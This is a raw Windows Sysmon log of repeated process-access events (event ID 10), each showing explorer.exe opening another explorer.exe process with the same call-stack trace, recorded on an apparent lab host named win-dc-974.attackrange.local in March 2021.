16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 